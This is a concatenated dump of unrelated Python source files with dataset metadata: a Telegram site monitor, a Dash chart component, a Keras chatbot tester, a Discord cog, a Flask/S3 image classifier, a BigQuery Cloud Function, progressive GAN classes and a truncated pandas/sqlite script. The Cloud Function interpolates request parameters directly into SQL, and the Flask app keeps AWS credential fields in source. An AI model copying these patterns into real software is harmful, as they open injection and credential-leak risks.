    for url in CONFIG.urls:
        try:
            returncode = requests.head(url).status_code
            # The original had byte-identical branches for status >= 400 and
            # < 400; one statement preserves that behaviour exactly.
            output = output + '- ' + url + ' ' + str(returncode) + '\n'
        except ConnectionError:
            # Host unreachable: report the URL without a status code.
            output = output + '- ' + url + '\n'
    if output == chronic['check_websites']:
        print('Nothing new… preventing spam.')
        chronic['check_websites'] = output
        return True, ''
    chronic['check_websites'] = output
    return False, output
# Registry of check callables executed by run() once per cycle; each returns
# an (ok, message) pair.
checks = [
    check_websites,
]
def run(bot=None, debug=False):
    """Main monitoring loop: once a minute run every registered check and
    report failures via Telegram (or stdout when *debug* is set)."""
    if not bot:
        print('No BOT defined')
        return
    while True:
        # Result discarded; presumably a token/session sanity ping -- TODO confirm.
        bot.getMe()['username']
        if not online():
            print('No internet Connection.')
        else:
            for check in checks:
                ok, message = check()
                if not ok:
                    if debug:
                        print(message)
                    else:
                        bot.sendMessage(17036700, message)
        time.sleep(60)
if __name__ == '__main__':
    # CLI: a single optional -d/--debug flag.
    parser = argparse.ArgumentParser(
        description='''
        This is EM will do checks and message you via Telegram if a check got something
        '''
    )
    parser.add_argument(
        '-d',
        '--debug',
        action='store_true',
        dest='debug',
        help='''Enables Debug Mode'''
    )
    args = parser.parse_args()
    # Debug mode prints check results instead of sending them via Telegram.
    debug = False
    bot = None
    if args.debug:
        print('DEBUG MODE ON')
        debug = True
    # Without a token the bot cannot send, so fall back to debug output.
    if CONFIG.telegram_token:
        bot = telepot.Bot(CONFIG.telegram_token)
    else:
        print('Got no token from config…DEBUG MODE ON')
        debug = True
    run(bot, debug)
| Stakdek/EM | em.py | em.py | py | 3,939 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "systemd.journal.JournalHandler",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "so... |
36714543817 | from dash import html, dcc
from dash.development.base_component import Component
from datafiles.views.view import View, DfView
from dataviz.irenderer import IDataStudyRenderer
import plotly.express as px
from dataviz.src.components.iplot import IPlot
class BubbleChart(IPlot):
    """Bubble-chart plot component: a Plotly scatter whose marker size and
    colour can be driven by dataframe columns."""

    _name = "bubble-chart"

    @classmethod
    def name(cls) -> str:
        """Return the registry name of this plot type."""
        return cls._name

    @staticmethod
    def new(plot_id: str, renderer: IDataStudyRenderer, source: View, *args,
            **kwargs) -> Component:
        """Build the Dash component rendering a bubble chart over *source*.

        Recognised keyword arguments: ``plot_name``, ``x_col``, ``y_col``,
        ``size``, ``color``, ``hover_name`` and ``layout`` (extra Plotly
        layout keys).  Raises ValueError when a referenced column is missing
        and NotImplementedError for non-dataframe views.
        """
        plot_name = kwargs.get("plot_name", source.name)
        if isinstance(source, DfView):
            data = source.data
            size = kwargs.pop("size", None)
            color = kwargs.pop("color", None)
            hover_name = kwargs.pop("hover_name", None)
            # Fail fast with a clear message on unknown column references.
            for arg in [size, color, hover_name]:
                if arg not in data.columns and arg is not None:
                    raise ValueError(f"Column {arg} not found")
            x_col = kwargs.pop("x_col", source.data.columns[0])
            # Default: plot every remaining column against x_col.
            y_col = kwargs.pop("y_col",
                               [col for col in data.columns if col != x_col])
        else:
            raise NotImplementedError()
        layout = kwargs.pop("layout", {})
        fig = px.scatter(
            data_frame=data, x=x_col, y=y_col,
            size=size, color=color, hover_name=hover_name,
            title="Graph with Column Selection"
        )
        # NOTE(review): ', '.join(y_col) assumes y_col is a list; a plain
        # string y_col would be joined character-wise -- TODO confirm callers.
        layout.update(
            xaxis={'title': x_col if x_col else "x"},
            yaxis={'title': ', '.join(y_col) if y_col else "y"},
            template='plotly_dark',
            plot_bgcolor='rgba(0, 0, 0, 0)',
            paper_bgcolor='rgba(0, 0, 0, 0)',
        )
        fig.update_layout(layout)
        plot = html.Div(
            className="plot",
            children=[
                html.Div(
                    children=IPlot.get_header(plot_id, plot_name)
                ),
                dcc.Graph(id=f"{source.name}_{plot_id}_graph", figure=fig),
            ]
        )
        return plot

    @staticmethod
    def config_panel(selected_view: View) -> list[Component]:
        """Return the dropdown widgets for configuring this plot."""
        if isinstance(selected_view, DfView):
            return (
                IPlot.html_dropdown("X column", 0,
                                    selected_view.data.columns) +
                IPlot.html_dropdown("Y column", 1,
                                    selected_view.data.columns) +
                IPlot.html_dropdown("Size column", 2,
                                    selected_view.data.columns) +
                IPlot.html_dropdown("Color column", 3,
                                    selected_view.data.columns)
            )
        raise NotImplementedError()

    @staticmethod
    def are_plot_args_valid(plot_args: list, selected_view: View) -> bool:
        """True when plot_args is non-empty and X/Y/Size are all selected."""
        # Original returned the list itself on success despite the -> bool
        # annotation; coerce so the declared type holds (same truthiness).
        return bool(plot_args) and all(plot_args[:3])

    @staticmethod
    def from_config(plot_id: str, renderer: IDataStudyRenderer, plot_args: list,
                    selected_view: View):
        """Instantiate the plot from the config-panel dropdown values."""
        return BubbleChart.new(plot_id, renderer, selected_view,
                               x_col=plot_args[0], y_col=plot_args[1],
                               size=plot_args[2], color=plot_args[3])
| adangreputationsquad/theriver | dataviz/src/components/bubble_charts.py | bubble_charts.py | py | 3,249 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "dataviz.src.components.iplot.IPlot",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "dataviz.irenderer.IDataStudyRenderer",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "datafiles.views.view.View",
"line_number": 18,
"usage_type": "nam... |
18526461373 | from keras.models import Model
from keras.layers.recurrent import LSTM
from keras.layers import Dense, Input, Embedding
from keras.preprocessing.sequence import pad_sequences
from keras.callbacks import ModelCheckpoint
from collections import Counter
import nltk
import numpy as np
from sklearn.model_selection import train_test_split
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import os
import glob
# Fixed seed for reproducible runs.
np.random.seed(42)
## Change the directory addresses, hidden units and test dataset ####
HIDDEN_UNITS = 50
TESTING_DATASET = 'dlgs_trial5.txt'
WEIGHTS_DIRECTORY_NAME = 'dlgs_trial5'
CWD = os.getcwd()
FINAL_RESULTS_FILE = CWD+'/'+WEIGHTS_DIRECTORY_NAME+'_all_weights.txt'
# Vocabulary sizes and max sequence lengths saved during training
# (np.save of a dict; .item() unwraps the 0-d object array).
c= np.load('word-context.npy')
context = c.item()
num_encoder_tokens = context['num_encoder_tokens']
num_decoder_tokens = context['num_decoder_tokens']
encoder_max_seq_length = context['encoder_max_seq_length']
decoder_max_seq_length = context['decoder_max_seq_length']
# Word <-> index lookup tables for both encoder and decoder vocabularies.
input_word2idx1 = np.load('input-word2idx.npy')
input_word2idx = input_word2idx1.item()
input_idx2word1 = np.load('input-idx2word.npy')
input_idx2word = input_idx2word1.item()
target_word2idx1 = np.load('target-word2idx.npy')
target_word2idx = target_word2idx1.item()
target_idx2word1 = np.load('target-idx2word.npy')
target_idx2word = target_idx2word1.item()
##========NETWORK ARCHITECTURE===================================
# Encoder: embedding + LSTM; only the final (h, c) states are kept and fed
# into the decoder as its initial state.
encoder_inputs = Input(shape=(None,), name='encoder_inputs')
encoder_embedding = Embedding(input_dim=num_encoder_tokens, output_dim=HIDDEN_UNITS,
                              input_length=encoder_max_seq_length, name='encoder_embedding')
encoder_lstm = LSTM(units=HIDDEN_UNITS, return_state=True, name='encoder_lstm')
encoder_outputs, encoder_state_h, encoder_state_c = encoder_lstm(encoder_embedding(encoder_inputs))
encoder_states = [encoder_state_h, encoder_state_c]
# Decoder: teacher-forced LSTM over one-hot target tokens, softmax over the
# target vocabulary at every step.
decoder_inputs = Input(shape=(None, num_decoder_tokens), name='decoder_inputs')
decoder_lstm = LSTM(units=HIDDEN_UNITS, return_state=True, return_sequences=True, name='decoder_lstm')
decoder_outputs, decoder_state_h, decoder_state_c = decoder_lstm(decoder_inputs,
                                                                initial_state=encoder_states)
decoder_dense = Dense(units=num_decoder_tokens, activation='softmax', name='decoder_dense')
decoder_outputs = decoder_dense(decoder_outputs)
model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
## =============== DECODER FUNCTION ===========================
def decode_sequence(input_text):
    """Greedy-decode a reply for *input_text* with the global seq2seq models.

    Tokenises the input, encodes it into LSTM states, then emits one word at
    a time until 'END' or the maximum decoder length is reached.
    """
    # Map tokens to ids; id 1 is the [UNK] fallback for out-of-vocab words.
    token_ids = [input_word2idx.get(token, 1)
                 for token in nltk.word_tokenize(input_text)]
    encoder_batch = pad_sequences([token_ids], encoder_max_seq_length)
    states = encoder_model.predict(encoder_batch)
    # Seed the decoder with a one-hot 'START' token.
    step_input = np.zeros((1, 1, num_decoder_tokens))
    step_input[0, 0, target_word2idx['START']] = 1
    decoded_words = []
    steps = 0
    while True:
        output_tokens, h, c = decoder_model.predict([step_input] + states)
        best_idx = np.argmax(output_tokens[0, -1, :])
        word = target_idx2word[best_idx]
        steps += 1
        if word != 'START' and word != 'END':
            decoded_words.append(word)
        if word == 'END' or steps >= decoder_max_seq_length:
            break
        # Feed the chosen word back in as the next decoder input.
        step_input = np.zeros((1, 1, num_decoder_tokens))
        step_input[0, 0, best_idx] = 1
        states = [h, c]
    return ' '.join(decoded_words)
##========== Load Weight File ========= ####
# Evaluate every checkpoint in the weights directory against the test file,
# appending all decoded replies to one results file.
os.chdir(WEIGHTS_DIRECTORY_NAME)
if os.path.isfile(FINAL_RESULTS_FILE):
    os.remove(FINAL_RESULTS_FILE)
output_file = open(FINAL_RESULTS_FILE,'a')
weight_files = glob.glob('*.h5')
for weight_file in weight_files:
    model.load_weights(weight_file)
    output_file.write("\n==========================================")
    output_file.write("\n\t"+weight_file)
    output_file.write("\n==========================================")
    # Rebuild the inference-time encoder/decoder around the freshly loaded
    # weights (rebuilt per checkpoint; could be hoisted -- TODO confirm).
    encoder_model = Model(encoder_inputs, encoder_states)
    decoder_state_inputs = [Input(shape=(HIDDEN_UNITS,)), Input(shape=(HIDDEN_UNITS,))]
    decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_state_inputs)
    decoder_states = [state_h, state_c]
    decoder_outputs = decoder_dense(decoder_outputs)
    decoder_model = Model([decoder_inputs] + decoder_state_inputs, [decoder_outputs] + decoder_states)
    with open(TESTING_DATASET, 'r', encoding='utf-8') as f:
        lines1 = f.read().split('\n')
    # NOTE(review): this open() handle is never closed explicitly.
    length_of_file= sum(1 for line in open(TESTING_DATASET))
    # Each line is "input<TAB>target"; decode the input side only.
    for line in lines1[: min(length_of_file,len(lines1) - 1)]:
        input_text, target_text = line.split('\t')
        decoded_sentence = decode_sequence(input_text)
        user_input = 'Input sentence:'+input_text
        bot_output = 'Decoded sentence:'+decoded_sentence
        # print('-')
        # print(user_input)
        # print(bot_output)
        output_file.write("\n-")
        output_file.write('\n'+user_input)
        output_file.write('\n'+bot_output)
    print('Tested with weights in : ', weight_file)
output_file.close()
| sbarham/dsrt | Trial/fred_testing.py | fred_testing.py | py | 5,473 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"l... |
27515698765 | from discord.ext import commands
import discord
import random
class HelpCog(commands.Cog):
    """Cog exposing the !help command that lists the server's commands."""

    def __init__(self, bot):
        self.bot = bot

    @commands.command(aliases=['хелп'])
    async def help(self, ctx):
        """Send one embed grouping the bot's commands by category."""
        prefix = '!'
        embed = discord.Embed(
            title='Команды сервера: ',
            description=f'`{prefix}help`',
            color=discord.Color(random.randint(0x000000, 0xFFFFFF)),
            inline=False,
        )
        embed.set_thumbnail(url=self.bot.user.avatar_url)
        categories = [
            ('Модерация: только для роли [Админ] ',
             f'`{prefix}clear` `{prefix}add_role` `{prefix}ban` `{prefix}mute` `{prefix}unmute` `{prefix}call`'),
            ('Развлечения: ',
             f'`{prefix}cat` `{prefix}quote`'),
            ('Прочее: ',
             f'`{prefix}info` `{prefix}my_info`'),
        ]
        for field_name, field_value in categories:
            embed.add_field(name=field_name, value=field_value, inline=False)
        await ctx.send(embed=embed)
def setup(bot):
    # discord.py extension hook: called by bot.load_extension to register the cog.
    bot.add_cog(HelpCog(bot))
{
"api_name": "discord.ext.commands.Cog",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "discord.ext.commands",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "discord.Embed",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "discor... |
35941249520 | import os
import sys
import inference
import storage
import boto3
# Flask
from flask import Flask, redirect, url_for, request, render_template, Response, jsonify, redirect
from werkzeug.utils import secure_filename
from gevent.pywsgi import WSGIServer
# Some utilites
import numpy as np
from util import base64_to_pil
# Port the WSGI server listens on.
TCP_PORT = 5000
# NOTE(review): credentials are hard-coded (currently blank) -- these should
# come from the environment or an AWS credentials profile, never the source.
aws_access_key_id=''
aws_secret_access_key=''
# Declare a flask app
app = Flask(__name__)
# S3 client handed to the inference layer.
s3 = boto3.client('s3',aws_access_key_id = aws_access_key_id, aws_secret_access_key = aws_secret_access_key)
inference_handler = inference.Inference(s3)
print('Model loaded. Check http://127.0.0.1:'+str(TCP_PORT))
@app.route('/', methods=['GET'])
def index():
    """Serve the single-page frontend."""
    # Main page
    return render_template('index.html')
@app.route('/predict', methods=['GET', 'POST'])
def predict():
    """Classify a base64-posted image and stash it for later user feedback."""
    if request.method != 'POST':
        # Non-POST requests fall through to None (Flask responds with a 500),
        # matching the original behaviour.
        return None
    image = base64_to_pil(request.json)
    # Key the stored image by a hash of its pixel bytes.
    image_key = str(hex(hash(image.tobytes())))
    prediction = inference_handler.predict(image)
    storage.temp_store(image_key, image)
    return jsonify(result=prediction, hash_value=image_key)
@app.route('/feedback', methods=['GET', 'POST'])
def feedback():
    """Record a user-supplied correction for a previously classified image."""
    global s3
    if request.method != 'POST':
        return None
    image_key = request.json['hash_value']
    corrected = str.lower(request.json['label'])
    # Only persist labels the model actually knows about.
    if corrected in inference_handler.classes:
        storage.copy_file(corrected, image_key)
    storage.remove_file(image_key)
    resp = jsonify(success=True)
    return resp
if __name__ == '__main__':
    # Serve with gevent's WSGI server instead of Flask's debug server.
    http_server = WSGIServer(('0.0.0.0', TCP_PORT), app)
    http_server.serve_forever()
| pingyuanw/293B | app.py | app.py | py | 1,691 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "boto3.client",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "inference.Inference",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
... |
22169703217 | from flask import make_response
from google.cloud import bigquery
# my modules
import config
from my_logging import getLogger
log = getLogger(__name__)
config = config.Config()
with open('auth.txt', 'r') as f:
cf_token = f.readline().rstrip('\r\n')
# entry point of Cloud Functions
# trigger = http
def atm_iv_data(request):
    """HTTP entry point: return ATM IV candles as a headerless CSV body."""
    if not check_auth(request):
        return 'Forbidden', 403
    # 'd' = look-back window in days, 'n' = n-th nearest contract month.
    days = request.args.get('d', default='7')
    contract_index = request.args.get('n', default='0')
    frame = query_atm_iv(days, contract_index)
    csv_body = frame.to_csv(index=False, header=False)
    response = make_response(csv_body, 200)
    response.headers['Content-type'] = 'text/csv; charset=utf-8'
    return response
def query_atm_iv(num_days, n_th_contract_month=0):
    """Query BigQuery for hourly ATM IV candles of the n-th nearest contract
    month over the last *num_days* days and return them as a DataFrame with
    open/high/low/close/started_at columns ordered by time.

    The stored hourly table is unioned with an on-the-fly aggregation of the
    raw option prices for the current (not yet rolled-up) day.
    """
    table_iv = f'{config.gcp_bq_dataset_name}.atm_iv'
    table_option_price = f'{config.gcp_bq_dataset_name}.option_price'
    # NOTE: num_days / n_th_contract_month are interpolated into the SQL;
    # they arrive as request parameters, so they are trusted to be numeric
    # strings here -- TODO confirm upstream validation.
    query = (f'''
    WITH t1 AS (
    SELECT
      (ARRAY_AGG(DISTINCT(last_trading_day) IGNORE NULLS ORDER BY last_trading_day ASC))[OFFSET({n_th_contract_month})] AS last_trading_day
    FROM
      {table_iv}
    WHERE
      started_at > TIMESTAMP_TRUNC(TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL -10 DAY), DAY)
      AND last_trading_day >= CURRENT_DATE('Asia/Tokyo')
    ), t2 AS (
    SELECT
      open,high,low,close, started_at
    FROM
      {table_iv}
    WHERE
      last_trading_day=(SELECT t1.last_trading_day FROM t1)
      AND started_at >= TIMESTAMP_TRUNC(TIMESTAMP_ADD(CURRENT_TIMESTAMP() , INTERVAL -{num_days} DAY), DAY)
    ), t3 AS (
    -- まだ時間足集計が保存されていない分(=UTCでの当日分)の時間足を集計する
    SELECT
      (array_agg(iv IGNORE NULLS ORDER BY created_at ASC))[OFFSET(0)] open,
      MAX(iv) high,
      MIN(iv) low,
      (array_agg(iv IGNORE NULLS ORDER BY created_at DESC))[OFFSET(0)] close,
      TIMESTAMP_SECONDS(CAST(TRUNC(UNIX_SECONDS(created_at)/3600) AS INT64) * 3600) AS started_at
    FROM
      {table_option_price}
    WHERE
     created_at >= TIMESTAMP_TRUNC(CURRENT_TIMESTAMP(), DAY)
     AND is_atm=True AND type=2 AND last_trading_day=(SELECT t1.last_trading_day FROM t1)
    GROUP BY started_at
    )
    SELECT
      open, high, low, close, started_at
    FROM
      t2
    UNION ALL
    SELECT
      open, high, low, close, started_at
    FROM
      t3
    ORDER BY started_at
    ''')
    client = bigquery.Client()
    query_job = client.query(query)
    rows = query_job.result()
    df = rows.to_dataframe()
    return df
def check_auth(request):
    """Return True when the request carries ``Authorization: Bearer <token>``
    matching the module-level ``cf_token``; False otherwise.

    A missing or malformed header yields False instead of raising (the
    original indexed split(' ')[1] unconditionally, so a bare "Bearer" or a
    header without a space crashed with IndexError).
    """
    auth_header = request.headers.get("Authorization")
    req_cf_token = None
    if auth_header is not None:
        parts = auth_header.split(' ')
        if len(parts) >= 2:
            req_cf_token = parts[1]
    return req_cf_token == cf_token
if __name__ == '__main__':
    # Local development harness: expose the Cloud Function through Flask.
    from flask import Flask, request
    app = Flask(__name__)
    @app.route('/')
    def index():
        return atm_iv_data(request)
    app.run('127.0.0.1', 8000, debug=True)
| terukusu/optionchan-gcp | functions_py/atm_iv/main.py | main.py | py | 3,306 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "my_logging.getLogger",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "config.Config",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "flask.make_response",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "config.gcp_bq_da... |
1292570084 | import tensorflow as tf
from pathlib import Path
import numpy as np
import dataset
import tensorflow_probability as tfp
tfd = tfp.distributions
class Encoder:
    """Progressively growing 3D convolutional encoder mapping volumes to the
    parameters (mean and log-variance concatenated) of a latent Gaussian.

    ``growing_encoder`` is the stack that is extended as resolution grows;
    ``train_encoder`` additionally contains the fade-in channel-compression
    layers used during training.
    """
    def __init__(self, latent_size):
        # No explicit base class, so this resolves to object.__init__.
        super(Encoder, self).__init__()
        # static parameters
        self.latent_size = latent_size
        self.num_channels = 1
        self.dimensionality = 3
        self.fmap_base = 4096
        self.fmap_max = 512
        # dynamic parameters
        self.current_resolution = 1
        self.current_width = 2 ** self.current_resolution
        self.growing_encoder = self.make_Ebase(nf=self._nf(1))
        self.train_encoder = tf.keras.Sequential(self.growing_encoder,name='sequential')
    def update_res(self):
        """Advance to the next resolution level (width doubles)."""
        self.current_resolution += 1
        self.current_width = 2 ** self.current_resolution
    def make_Ebase(self,nf):
        """Base head: flatten a 2x2x2 feature volume into 2*latent_size units."""
        images = tf.keras.layers.Input(shape= (2,)*self.dimensionality + (nf,), name='images_2iso')
        # Final dense layer
        x = tf.keras.layers.Flatten()(images)
        x = tf.keras.layers.Dense(2*self.latent_size,activation=None)(x)
        return tf.keras.models.Model(inputs=[images], outputs=[x], name='z_params')
    def make_Eblock(self,name,nf):
        """Downsampling block: strided 3D conv + leaky ReLU."""
        # Built as a Sequential because the input size is not known here,
        # so no explicit Input layer is used.
        block_layers = []
        #block_layers.append(tf.keras.layers.Convolution3D(nf, kernel_size=3, strides=1, padding='same'))
        #block_layers.append(tf.keras.layers.Activation(tf.nn.leaky_relu))
        block_layers.append(tf.keras.layers.Convolution3D(nf, kernel_size=4, strides=2, padding='same')) # check padding
        block_layers.append(tf.keras.layers.Activation(tf.nn.leaky_relu))
        return tf.keras.models.Sequential(block_layers, name=name)
    def _nf(self, stage):
        # computes number of filters for each layer
        return min(int(self.fmap_base / (2.0 ** (stage))), self.fmap_max)
    def _weighted_sum(self):
        """Lambda blending two tensors: (1-alpha)*a + alpha*b (fade-in)."""
        return tf.keras.layers.Lambda(lambda inputs : (1-inputs[2])*inputs[0] + (inputs[2])*inputs[1])
    def add_resolution(self):
        """Prepend a new downsampling block and rebuild the train encoder
        with the alpha-blended fade-in path at the new resolution."""
        # Add resolution
        self.update_res()
        # Gan images
        images = tf.keras.layers.Input(shape=(self.current_width,)*self.dimensionality+ (self.num_channels,),name = 'GAN_images')
        alpha = tf.keras.layers.Input(shape=[], name='e_alpha')
        # Compression block
        name = 'block_{}'.format(self.current_resolution)
        e_block = self.make_Eblock(name=name,nf=self._nf(self.current_resolution-1))
        # Channel compression
        # Path 1: downsample the image first, then lift to feature channels.
        from_rgb_1 = tf.keras.layers.AveragePooling3D()(images)
        from_rgb_1 = tf.keras.layers.Conv3D(self._nf(self.current_resolution-1), kernel_size=1, padding='same', name='from_rgb_1')(from_rgb_1)
        # Path 2: lift to channels first, then run the new encoder block.
        from_rgb_2 = tf.keras.layers.Conv3D(self._nf(self.current_resolution), kernel_size=1, padding='same', name='from_rgb_2')(images)
        from_rgb_2 = e_block(from_rgb_2)
        lerp_input = self._weighted_sum()([from_rgb_1, from_rgb_2, alpha]) # RANDOM ALPHA
        # Getting latent code
        e_z = self.growing_encoder(lerp_input)
        # Updating the model
        self.growing_encoder = tf.keras.Sequential([e_block,self.growing_encoder]) # without channel compression
        self.train_encoder = tf.keras.Model(inputs=[images,alpha],outputs=[e_z]) # with channel compression
class Decoder():
    """Wraps a pretrained progressive GAN generator and adds per-voxel mean
    and sigma heads, producing the decoder of a VAE-style model."""
    def __init__(self, latent_size, generator_folder):
        super(Decoder, self).__init__()
        # static parameters
        self.latent_size = latent_size
        self.model_folder = generator_folder
        # dynamic parameters
        self.current_resolution = 1
        self.current_width = 2** self.current_resolution
        self.decoder = None
    def get_model(self,folder,res):
        # find the model for the appropriate resolution
        path = Path(folder)
        return str(list(path.glob('g_{}.h5'.format(res)))[0].resolve()) # check if single one
    def update_res(self):
        """Advance to the next resolution level (width doubles)."""
        self.current_resolution += 1
        self.current_width = 2 ** self.current_resolution
    def make_Dblock(self,name):
        """Output head: dense layer reshaped to a width^3 volume."""
        block_layers = []
        block_layers.append(tf.keras.layers.Flatten()) # required? -- TODO confirm
        block_layers.append(tf.keras.layers.Dense(self.current_width**3))
        block_layers.append(tf.keras.layers.Reshape((self.current_width,self.current_width,self.current_width),input_shape=(self.current_width**3,)))
        #block_layers.append(tf.keras.layers.Activation(tf.nn.leaky_relu)) - depends on expression of NLL loss
        return tf.keras.models.Sequential(block_layers, name=name)
    def add_resolution(self):
        """Load the pretrained generator for the new resolution and attach
        fresh trainable mu/sigma heads. No-op until resolution exceeds 2."""
        self.update_res()
        if self.current_resolution > 2:
            latent = tf.keras.layers.Input(shape=self.latent_size)
            alpha = tf.keras.layers.Input(shape=[], name='d_alpha')
            common = tf.keras.models.load_model(self.get_model(self.model_folder,self.current_resolution), custom_objects={'leaky_relu': tf.nn.leaky_relu}, compile=True)([latent,alpha])
            # Drop the trailing channel axis before the dense heads.
            shape = tf.shape(common)
            common = tf.reshape(common,[shape[0],common.shape[1],common.shape[2],common.shape[3]])
            mu = self.make_Dblock(name='mu_block')(common)
            sigma = self.make_Dblock(name='sigma_block')(common)
            self.decoder = tf.keras.Model(inputs=[latent,alpha],outputs=[mu,sigma])
            self.decoder.trainable = True
    def get_decoder(self):
        return self.decoder
    def get_currentres(self):
        return self.current_resolution
class Generator():
    """Frozen pretrained progressive GAN generator used for sampling."""
    def __init__(self, latent_size, generator_folder):
        super(Generator,self).__init__()
        #static parameters
        self.latent_size = latent_size # LOOK UP WHAT SIZE
        self.model_folder = generator_folder
        # dynamic
        self.current_resolution = 1
        # NOTE(review): initialised to 2**3 while the other classes use
        # 2**current_resolution (=2 here) -- possibly inconsistent, confirm.
        self.current_width = 2**3
        self.generator = None
    def get_model(self,folder,res):
        # find the model for the appropriate resolution
        path = Path(folder)
        try:
            return str(list(path.glob('**/g_{}.h5'.format(res)))[0].resolve())
        # NOTE(review): bare except swallows everything (incl. IndexError when
        # no file matches) and implicitly returns None.
        except: print('No pretrained model for this resolution')
    def update_res(self):
        self.current_resolution += 1
        self.current_width = 2 ** self.current_resolution
    def add_resolution(self):
        """Load the frozen pretrained generator for the next resolution."""
        self.update_res()
        if self.current_resolution > 2:
            self.generator = tf.keras.models.load_model(self.get_model(self.model_folder,self.current_resolution), custom_objects={'leaky_relu': tf.nn.leaky_relu}, compile=True)
            self.generator.trainable = False
    def generate_latents(self,num_samples):
        """Return *num_samples* standard-normal latent vectors of shape (1, latent_size)."""
        latents = []
        for i in range(num_samples):
            latent = tf.random.normal((1, self.latent_size))
            latents.append(latent)
        return latents
{
"api_name": "tensorflow_probability.distributions",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.Sequential",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 25,
"usage_type": "attribute"
},... |
22781218068 | import pandas as pd
from extensions import extensions
from initial_values.initial_values import be_data_columns_to_master_columns, year_dict
from datetime import datetime
from dateutil.relativedelta import relativedelta
from initial_values.initial_values import sap_user_status_cons_status_list, be_data_cons_status_list, sap_system_status_ban_list, operaton_status_translation, master_data_to_ru_columns, month_dict
import sqlite3
from openpyxl.utils.dataframe import dataframe_to_rows
import openpyxl
db = extensions.db
plug = 'plug'
date_time_plug = '1.1.2199'
date_time_plug = datetime.strptime(date_time_plug, '%d.%m.%Y')
# наименование итераций
iterations = {
"Дата вывода 0 - итерация продления": "iteration_0",
"Дата вывода 1 - итерация продления": "iteration_1",
"Дата вывода 1 - итерация продления (корр 23.06.22)": "iteration_1_1",
"Дата вывода 2 - итерация продления (корр 30.06.22)": "iteration_2"
}
iterations_list = ["operation_finish_date_iteration_0", "operation_finish_date_iteration_1", "operation_finish_date_iteration_2"]
iterations_dict = {
# "operation_finish_date_iteration_0":"Дата вывода 0 - итерация продления",
# "operation_finish_date_iteration_1":"Дата вывода 1 - итерация продления",
"operation_finish_date_iteration_2":"Дата вывода 2 - итерация продления"
}
def read_be_2_eo_xlsx():
# читаем загруженный файл
be_eo_raw_data = pd.read_excel('uploads/be_eo_2_data.xlsx', sheet_name='be_eo_data', index_col = False)
be_eo_data = be_eo_raw_data.rename(columns=be_data_columns_to_master_columns)
# список колонок
update_eo_column_list = list(be_eo_data.columns)
be_eo_data['eo_code'] = be_eo_data['eo_code'].astype(str)
be_eo_data['operation_finish_date_iteration_0'] = pd.to_datetime(be_eo_data['operation_finish_date_iteration_0'], format='%d.%m.%Y')
be_eo_data['operation_finish_date_iteration_1'] = pd.to_datetime(be_eo_data['operation_finish_date_iteration_1'], format='%d.%m.%Y')
be_eo_data['operation_finish_date_iteration_2'] = pd.to_datetime(be_eo_data['operation_finish_date_iteration_2'], format='%d.%m.%Y')
be_eo_data['conservation_start_date'] = pd.to_datetime(be_eo_data['conservation_start_date'], format='%d.%m.%Y')
be_eo_data['conservation_finish_date'] = pd.to_datetime(be_eo_data['conservation_finish_date'], format='%d.%m.%Y')
be_eo_data['repair_start_date'] = pd.to_datetime(be_eo_data['repair_start_date'], format='%d.%m.%Y')
be_eo_data['repair_finish_date'] = pd.to_datetime(be_eo_data['repair_finish_date'], format='%d.%m.%Y')
# пишем заглушки в поля conservation_finish_date, repair_start_date, repair_finish_date
be_eo_data['conservation_finish_date'].fillna(date_time_plug, inplace = True)
# получаем данные из мастер-файла
con = sqlite3.connect("database/datab.db")
cursor = con.cursor()
# sql = "SELECT * FROM eo_DB JOIN be_DB"
sql = "SELECT \
eo_DB.eo_code, \
eo_DB.temp_eo_code, \
eo_DB.temp_eo_code_status, \
eo_DB.be_code, \
eo_DB.head_type, \
be_DB.be_description, \
eo_DB.eo_class_code, \
eo_class_DB.eo_class_description, \
models_DB.eo_model_name, \
models_DB.eo_category_spec, \
models_DB.type_tehniki, \
models_DB.marka_oborudovania, \
models_DB.cost_center, \
eo_DB.eo_model_id, \
eo_DB.eo_description, \
eo_DB.gar_no, \
eo_DB.constr_type, \
eo_DB.constr_type_descr, \
eo_DB.operation_start_date, \
eo_DB.expected_operation_period_years, \
eo_DB.operation_finish_date_calc, \
eo_DB.sap_planned_finish_operation_date, \
eo_DB.operation_finish_date_sap_upd, \
eo_DB.sap_system_status, \
eo_DB.sap_user_status, \
eo_DB.prodlenie_2022, \
eo_DB.custom_eo_status \
FROM eo_DB \
LEFT JOIN models_DB ON eo_DB.eo_model_id = models_DB.eo_model_id \
LEFT JOIN be_DB ON eo_DB.be_code = be_DB.be_code \
LEFT JOIN eo_class_DB ON eo_DB.eo_class_code = eo_class_DB.eo_class_code \
LEFT JOIN operation_statusDB ON eo_DB.expected_operation_status_code = operation_statusDB.operation_status_code"
master_eo_df = pd.read_sql_query(sql, con)
# подменяем временнные номера
